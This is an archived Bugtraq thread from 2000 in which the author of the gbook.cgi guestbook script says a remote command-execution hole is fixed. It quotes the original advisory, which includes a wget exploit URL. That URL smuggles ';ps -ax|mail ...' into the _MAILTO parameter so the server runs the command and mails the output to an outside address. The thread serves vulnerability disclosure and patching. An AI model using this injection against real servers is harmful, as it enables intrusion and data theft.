|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability [FIXED]
From: William Kendrick (nbs
SONIC.NET)Date: Sat Nov 11 2000 - 21:00:58 CST
- Next message: secureCONECTIVA.COM.BR: "[CLSA-2000:339] Conectiva Linux Security Announcement - bind"
- Previous message: FreeBSD Security Advisories: "FreeBSD Ports Security Advisory: FreeBSD-SA-00:67.gnupg"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
So far as I can tell, it's fixed... Please let me know if anyone
sees any other glaring holes. It IS rather ancient software.
-bill!
Forwarded message:
> From mbrennenfni.com Sat Nov 11 10:28:17 2000
> X-envelope-info: <mbrennenfni.com>
> Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST)
> From: Michael Brennen <mbrennenfni.com>
> To: William Kendrick <nbssonic.net>
> Cc: mathacksware.com
> Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability
> (fwd)
> In-Reply-To: <200011110920.eAB9KVL11974sonic.net>
> Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000henry.fni.com>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
>
>
> You might want to post this to bugtraq.
>
> -- Michael
>
>
> On Sat, 11 Nov 2000, William Kendrick wrote:
>
> > Should be fixed, thanks.
> >
> > I wonder why I wasn't informed directly! My zippy.sonoma.edu address
> > _should_ still be getting forwarded to my new addr.
> >
> > New download available at:
> >
> > ftp://ftp.sonic.net/pub/users/nbs/unix/www/gbook/gbook.tar.gz
> >
> > Modification date: November 11, 2000.
> >
> > -bill!
> >
> > >
> > >
> > > Don't know if you saw this or not; you probably have by now. There
> > > are a couple of vulnerable sprintf() also that should be replaced by
> > > snprintf().
> > >
> > > -- Michael
> > >
> > >
> > > ---------- Forwarded message ----------
> > > Date: Fri, 10 Nov 2000 20:38:44 +0900
> > > From: JW Oh <matIVNTECH.COM>
> > > To: BUGTRAQSECURITYFOCUS.COM
> > > Subject: [hacksware] gbook.cgi remote command execution vulnerability
> > >
> > > Bug Report
> > >
> > > 1. Name: gbook.cgi remote command execution vulnerability
> > > 2. Release Date: 2000.11.10
> > > 3. Affected Application:
> > > GBook - A web site guestbook
> > > By Bill Kendrick
> > > kendrickzippy.sonoma.edu
> > > http://zippy.sonoma.edu/kendrick/
> > > 4. Author: mathacksware.com
> > > 5. Type: Input validation Error
> > >
> > > 6. Explanation
> > > gbook.cgi is used by some web sites.
> > > We can set _MAILTO parameter, and popen is called to execute mail command.
> > > If ';' is used in _MAILTO variable, you can execute arbitrary command with it.
> > > It's so trivial. :)
> > > 7. Exploits
> > > This exploit executes "ps -ax" command and sends the result to hahayaho.com.
> > >
> > > wget "yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fweyaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few">http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20hahayaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fweyaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"
> > >
> > >
> > > =================================================
> > > | mathacksware.com |
> > > | http://hacksware.com |
> > > =================================================
> > >
> > >
> >
>
- Next message: secureCONECTIVA.COM.BR: "[CLSA-2000:339] Conectiva Linux Security Announcement - bind"
- Previous message: FreeBSD Security Advisories: "FreeBSD Ports Security Advisory: FreeBSD-SA-00:67.gnupg"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]